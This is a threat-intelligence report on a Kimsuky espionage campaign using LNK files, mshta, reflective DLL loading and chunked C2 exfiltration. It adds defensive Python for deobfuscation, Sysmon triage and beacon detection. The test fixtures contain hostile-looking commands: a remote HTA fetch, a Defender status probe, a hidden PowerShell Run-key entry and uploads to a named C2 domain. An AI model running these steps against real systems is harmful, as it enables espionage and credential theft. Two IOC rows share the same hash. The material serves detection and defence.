Kimsuky APT Uses LNK Files to Deploy Reflective Malware and Evade Windows Defender
The North Korean state-sponsored group Kimsuky, also known as APT43, Thallium, and Velvet Chollima, has been accused of launching a recent cyber-espionage campaign in which the attackers used malicious Windows shortcut (LNK) files as the first point of entry to breach South Korean government agencies, defense contractors, and research institutions.
The operation begins with phishing emails containing ZIP archives that embed these LNK files, disguised as legitimate documents.
Upon execution, the LNK file invokes mshta.exe to load a remote HTML Application (HTA) file from a Content Delivery Network (CDN), which contains heavily obfuscated VBScript.
This script employs decimal and hexadecimal conversions via CLng and Chr functions to construct strings for URLs and commands, effectively bypassing static analysis and endpoint detection.
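The CLng/Chr construction described above is only an obstacle to reading a sample, not to decoding it statically. The following Python is an added analyst helper, not code from the report or from the samples it describes: it finds runs of `Chr(...)` calls joined by `&`, evaluates the decimal or `&H` hexadecimal literal inside each (with or without a `CLng` wrapper), and rewrites the run as a plain string literal. The VBScript snippet it is run against is constructed for this example; any `Chr()` whose argument is a variable rather than a literal is left untouched.

```python
"""Static string recovery for VBScript built from Chr()/CLng() calls.
Added example; the sample script below is constructed, not taken from a real HTA."""
import re

# One Chr(...) call with at most one nested call, e.g. Chr(65) or Chr(CLng("&H41")).
_ONE = r'Chr\s*\([^()]*(?:\([^()]*\))?[^()]*\)'
# Two or more such calls joined by the VBScript concatenation operator "&".
_CHR_RUN = re.compile(_ONE + r'(?:\s*&\s*' + _ONE + r')+', re.IGNORECASE)
# Extracts the numeric literal: decimal (65, "65") or hex (&H41, "&H41"),
# optionally wrapped in CLng(...).
_CHR_CALL = re.compile(
    r'Chr\s*\(\s*(?:CLng\s*\(\s*)?'
    r'(?:"?(&H[0-9A-Fa-f]+)"?|"?(\d+)"?)'
    r'\s*\)?\s*\)',
    re.IGNORECASE,
)


def _char_from_match(m: re.Match) -> str:
    hex_lit, dec_lit = m.groups()
    code = int(hex_lit[2:], 16) if hex_lit else int(dec_lit)
    return chr(code)


def _decode_run(run: str):
    """Decode one Chr() run; return None if any argument is not a literal."""
    calls = list(_CHR_CALL.finditer(run))
    if len(calls) != len(re.findall(_ONE, run, re.IGNORECASE)):
        return None  # e.g. Chr(n) with a variable: cannot evaluate statically
    return "".join(_char_from_match(c) for c in calls)


def decode_chr_runs(script: str) -> list:
    """Return every string the script assembles from two or more Chr() calls."""
    results = []
    for run in _CHR_RUN.finditer(script):
        text = _decode_run(run.group(0))
        if text:
            results.append(text)
    return results


def deobfuscate(script: str) -> str:
    """Replace each decodable Chr() run with a quoted VBScript literal."""
    def _sub(m):
        text = _decode_run(m.group(0))
        if text is None:
            return m.group(0)
        return '"' + text.replace('"', '""') + '"'
    return _CHR_RUN.sub(_sub, script)


# Constructed sample mimicking the obfuscation style (mixed hex and decimal).
SAMPLE_VBS = (
    'Dim u\r\n'
    'u = Chr(CLng("&H68")) & Chr(CLng("&H74")) & Chr(CLng("&H74")) & Chr(CLng("&H70")) '
    '& Chr(58) & Chr(47) & Chr(47) & Chr(CLng("&H65")) & Chr(CLng("&H78"))\r\n'
    'Set o = CreateObject(Chr(87) & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) '
    '& Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108))\r\n'
    'v = Chr(65) & Chr(n)\r\n'  # variable argument: left as-is
)

if __name__ == "__main__":
    print(decode_chr_runs(SAMPLE_VBS))
    print(deobfuscate(SAMPLE_VBS))
```

Running the block on the constructed sample recovers `http://ex` and `WScript.Shell` and rewrites the `CreateObject` line to `CreateObject("WScript.Shell")`, which is what a reviewer wants to see before deciding whether the script is worth detonating.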
Sophisticated Infection Chain
According to the report, the malware then downloads a decoy PDF lure, such as repurposed South Korean government notices about sex offenders or tax penalties, to distract the victim while proceeding with payload deployment.
Simultaneously, it queries the status of Windows Defender using cmd /c sc query WinDefend. If Defender is active, the script downloads and decodes a ZIP archive containing Base64-encoded PowerShell scripts for information stealing and keylogging.
These scripts ensure one-time execution by storing the process ID in a UUID-based temporary file, perform anti-VM checks against manufacturers like VMware, Microsoft, and VirtualBox, and establish persistence via a registry run key under HKCU\Software\Microsoft\Windows\CurrentVersion\Run named WindowsSecurityCheck.
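Each stage of the chain above leaves a host-level trace: mshta.exe launched with a remote URL, a script host spawning cmd.exe, `sc query WinDefend` run from that shell, and a value written under the HKCU Run key. The following Python is an added example of triage logic over already-parsed Sysmon-style events (ProcessCreate, event 1, and RegistryEvent value-set, event 13); it is not code from the report or from any detection product. The event records, hostnames, SID and the CDN hostname `cdn.example.invalid` are constructed for this example; the file name `sxzjl.hta` and the value name `WindowsSecurityCheck` come from the report.

```python
"""Triage Sysmon-style events for the LNK -> mshta -> Defender probe -> Run key chain.
Added example; events below are constructed, field names follow Sysmon's schema."""
import re
from dataclasses import dataclass

REMOTE_URL = re.compile(r'https?://\S+', re.IGNORECASE)
# Sysmon reports HKCU as HKU\<SID>\..., so match the Run path regardless of hive prefix.
RUN_KEY = re.compile(r'\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\([^\\]+)$',
                     re.IGNORECASE)
DEFENDER_QUERY = re.compile(r'\bquery\s+WinDefend\b', re.IGNORECASE)
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}


@dataclass
class Finding:
    rule: str
    host: str
    detail: str


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def triage(events) -> list:
    """Apply the four chain-stage rules to a list of event dicts, in order."""
    findings = []
    for ev in events:
        host = ev.get("Computer", "?")
        if ev.get("EventID") == 1:  # ProcessCreate
            image = _basename(ev.get("Image", ""))
            parent = _basename(ev.get("ParentImage", ""))
            cmd = ev.get("CommandLine", "")
            # Stage 1: mshta fetching an HTA over HTTP(S) rather than a local file.
            if image == "mshta.exe" and REMOTE_URL.search(cmd):
                findings.append(Finding("mshta_remote_hta", host, cmd))
            # Stage 2: a script host spawning a command shell.
            if parent in SCRIPT_HOSTS and image in SHELLS:
                findings.append(Finding("script_host_spawns_shell", host, f"{parent} -> {cmd}"))
            # Stage 3: Defender status probe from a shell or script host (assumed rule).
            if image == "sc.exe" and DEFENDER_QUERY.search(cmd) and parent in (SHELLS | SCRIPT_HOSTS):
                findings.append(Finding("defender_status_probe", host, cmd))
        elif ev.get("EventID") == 13:  # RegistryEvent: value set
            m = RUN_KEY.search(ev.get("TargetObject", ""))
            if m:
                findings.append(Finding("run_key_persistence", host,
                                        f"{m.group(1)} = {ev.get('Details', '')}"))
    return findings


# Constructed events: one infected host (WS01) and one benign local HTA launch (WS02).
SAMPLE_EVENTS = [
    {"EventID": 1, "Computer": "WS01", "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" https://cdn.example.invalid/sxzjl.hta'},
    {"EventID": 1, "Computer": "WS01", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "cmd /c sc query WinDefend"},
    {"EventID": 1, "Computer": "WS01", "Image": r"C:\Windows\System32\sc.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "sc query WinDefend"},
    {"EventID": 13, "Computer": "WS01",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\WindowsSecurityCheck",
     "Details": r"powershell.exe -w hidden -f C:\Users\u\AppData\Local\Temp\x.ps1"},
    {"EventID": 1, "Computer": "WS02", "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" C:\Program Files\Vendor\setup.hta'},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.host}: {f.rule}: {f.detail}")
```

Any one of these rules fires on legitimate activity now and then; the value is in seeing two or more of them on the same host within minutes, in the order the chain executes them.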
Data Exfiltration Tactics
When Windows Defender is disabled, the malware escalates by downloading an alternative HTA file that embeds Base64-encoded payloads, extracting and executing a reflective DLL loader without disk writes.

This loader decrypts encrypted files using RC4, injects them into memory via VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread, targeting the ReflectiveLoader export to evade file-based detection.
The injected payload steals app_bound_encrypted_key from Chromium-based browsers like Chrome, Edge, and Brave, facilitating offline decryption of credentials and cookies.
Throughout the campaign, the malware conducts victim profiling by compressing certificate directories (NPKI, GPKI), harvesting recent files from shortcut paths, extracting browser data including logins and extensions, and scanning drives for sensitive extensions like .docx, .pdf, and cryptocurrency-related terms.
Data is staged in a UUID-named folder under %TEMP%, compressed into init.zip (renamed to init.dat), and exfiltrated in 1MB chunks via HTTP POST to command-and-control (C2) servers such as ygbsbl.hopto.org, disguised as normal web traffic.
Keylogging captures keystrokes, clipboard changes, and window titles using GetAsyncKeyState and GetForegroundWindow APIs, logging to k.log for periodic upload.
The C2 loop, executed every 10 minutes, queries /rd for file uploads, /wr for downloads, and /cm for remote PowerShell commands via Invoke-Expression, enabling dynamic payload delivery and real-time control.
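A fixed 10-minute check-in to one host, interleaved with bursts of 1 MB POSTs, is a recognisable shape in outbound proxy logs. The following Python is an added example of that network-side detection, not code from the report: it collapses requests within a short window into single "contacts", flags a client/host pair whose contacts arrive at a near-constant interval close to the expected period, and separately counts full-size upload chunks per pair. The log lines, client IPs, timestamps and the `updates.example.invalid` control host are constructed; `ygbsbl.hopto.org` and the `/rd`, `/wr`, `/cm` paths are from the report. The log format (time, client, method, host, path, status, bytes sent) and the reading of "1MB" as 1 MiB are assumptions.

```python
"""Beacon-interval and chunked-upload detection over constructed proxy-log lines.
Added example; log format and chunk size are assumptions, see lead-in."""
from collections import defaultdict
from datetime import datetime
from statistics import median

C2_PATHS = {"/rd", "/wr", "/cm"}  # endpoints named in the report
CHUNK = 1_048_576                 # assumed: "1MB chunks" read as 1 MiB


def parse_line(line: str) -> dict:
    """Parse '<ISO8601> <client> <method> <host> <path> <status> <bytes sent>'."""
    ts, src, method, host, path, status, sent = line.split()
    return {"ts": datetime.fromisoformat(ts.replace("Z", "+00:00")),
            "src": src, "method": method, "host": host, "path": path,
            "status": int(status), "sent": int(sent)}


def _contacts(recs, burst_gap=30):
    """Collapse requests closer than burst_gap seconds into one contact, so a
    burst of upload chunks counts as a single check-in."""
    recs = sorted(recs, key=lambda r: r["ts"])
    starts = [recs[0]["ts"]]
    for prev, cur in zip(recs, recs[1:]):
        if (cur["ts"] - prev["ts"]).total_seconds() > burst_gap:
            starts.append(cur["ts"])
    return starts


def find_beacons(lines, period=600, tolerance=0.1, min_hits=3) -> dict:
    """Return {(client, host): info} for pairs contacted at ~period seconds."""
    by_pair = defaultdict(list)
    for rec in map(parse_line, lines):
        by_pair[(rec["src"], rec["host"])].append(rec)
    beacons, slack = {}, period * tolerance
    for pair, recs in by_pair.items():
        starts = _contacts(recs)
        if len(starts) < min_hits:
            continue
        gaps = [(b - a).total_seconds() for a, b in zip(starts, starts[1:])]
        med = median(gaps)
        # Median near the expected period and every gap near the median: low jitter.
        if abs(med - period) <= slack and all(abs(g - med) <= slack for g in gaps):
            beacons[pair] = {"interval": med, "hits": len(starts),
                             "c2_paths": sorted({r["path"] for r in recs} & C2_PATHS)}
    return beacons


def find_chunked_uploads(lines, chunk=CHUNK, min_chunks=2) -> dict:
    """Return {(client, host): {...}} for pairs that sent >= min_chunks full chunks."""
    stats = defaultdict(lambda: {"full_chunks": 0, "bytes": 0})
    for rec in map(parse_line, lines):
        if rec["method"] != "POST":
            continue
        s = stats[(rec["src"], rec["host"])]
        s["bytes"] += rec["sent"]
        if rec["sent"] == chunk:  # the final chunk is smaller, so count exact-size ones
            s["full_chunks"] += 1
    return {pair: s for pair, s in stats.items() if s["full_chunks"] >= min_chunks}


# Constructed log: 10.0.0.5 polls every ~10 min and uploads 2.4 MB in three chunks;
# 10.0.0.7 talks to an update host at irregular times.
SAMPLE_LOG = """\
2025-09-01T09:00:00Z 10.0.0.5 GET ygbsbl.hopto.org /rd 200 0
2025-09-01T09:10:02Z 10.0.0.5 GET ygbsbl.hopto.org /wr 200 0
2025-09-01T09:20:01Z 10.0.0.5 GET ygbsbl.hopto.org /cm 200 0
2025-09-01T09:30:03Z 10.0.0.5 POST ygbsbl.hopto.org /rd 200 1048576
2025-09-01T09:30:05Z 10.0.0.5 POST ygbsbl.hopto.org /rd 200 1048576
2025-09-01T09:30:07Z 10.0.0.5 POST ygbsbl.hopto.org /rd 200 412345
2025-09-01T09:40:00Z 10.0.0.5 GET ygbsbl.hopto.org /rd 200 0
2025-09-01T09:00:30Z 10.0.0.7 GET updates.example.invalid /check 200 0
2025-09-01T09:03:10Z 10.0.0.7 GET updates.example.invalid /check 200 0
2025-09-01T09:25:00Z 10.0.0.7 GET updates.example.invalid /check 200 0
""".splitlines()

if __name__ == "__main__":
    print(find_beacons(SAMPLE_LOG))
    print(find_chunked_uploads(SAMPLE_LOG))
```

The period and tolerance are parameters because the report gives a 10-minute loop for this campaign only; running the same function with a range of periods, or replacing the fixed-period test with a low coefficient of variation on the gaps, generalises it to beacons whose interval is unknown.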
Attribution to Kimsuky is reinforced by consistent TTPs, including PowerShell abuse and South Korean-specific lures, aligning with prior reports from Seqrite and security researchers in early 2025.
This campaign underscores Kimsuky’s evolution in blending social engineering with modular malware, exploiting legitimate tools for stealth and persistence.
By mapping to MITRE ATT&CK techniques like T1204.002 (Malicious File Execution), T1059.005 (VBScript), T1218.005 (mshta), and T1620 (Reflective Code Loading), it highlights risks to politically sensitive sectors.
Organizations should implement behavioral monitoring, PowerShell auditing, and unified SASE platforms for anomaly detection to disrupt such threats.
Indicators of Compromise (IOCs)
| Indicator (SHA256 or domain) | Description |
|---|---|
| 87e8287509a79099170b5b6941209b5787140a8f6182d460618d4ed93418aff9 | Malicious LNK |
| 232e618eda0ab1b85157ddbc67a4d0071c408c6f82045da2056550bfbca4140f | Malicious LNK |
| 0df3afc6f4bbf69e569607f52926b8da4ce1ebc2a4747e7a17dbc0a13e050707 | Zip.log |
| 7b06e14a39ff68f75ad80fd5f43a8a3328053923d101a34b7fb0d55235ab170b | sxzjl.hta |
| b98626ebd717ace83cd7c312f081ce260e00f299b8d427bfb9ec465fa4bdf28b | V3.hta |
| 3db2e176f53bf2b8b1c0d26b8a880ff059c0b4d1eda1cc4e9865bbe5a04ad37a | Sys.dll |
| ce4dbe59ca56039ddc7316fee9e883b3d3a1ef17809e7f4eec7c3824ae2ebf96 | App64.log |
| a499b66ea8eb5f32d685980eddacaaf0abc1f9eac7e634229e972c2bf3b03d68 | Mani64.log |
| ce4dbe59ca56039ddc7316fee9e883b3d3a1ef17809e7f4eec7c3824ae2ebf96 | Net64.log |
| ygbsbl.hopto.org | C&C server |
| hvmeyq.viewdns.net | C&C server |